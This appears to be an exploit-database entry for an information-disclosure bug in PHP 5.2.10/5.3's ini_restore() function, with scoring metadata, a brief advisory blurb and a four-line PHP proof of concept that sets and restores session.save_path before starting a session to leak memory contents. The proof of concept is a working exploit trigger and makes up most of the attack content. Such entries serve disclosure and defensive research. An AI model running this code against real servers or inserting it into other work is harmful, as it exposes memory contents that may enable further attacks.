PHP 5.2.10/5.3 - 'ini_restore()' Memory Information Disclosure (1)

2009-08-1000:00:00

Maksymilian Arciemowicz

www.exploit-db.com

AI Score

7.4

Confidence

Low

EPSS

0.014

Percentile

86.6%

JSON

source: https://www.securityfocus.com/bid/36009/info

PHP is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 

<?php

ini_set("session.save_path", "0123456789ABCDEF");
ini_restore("session.save_path");
session_start();
?>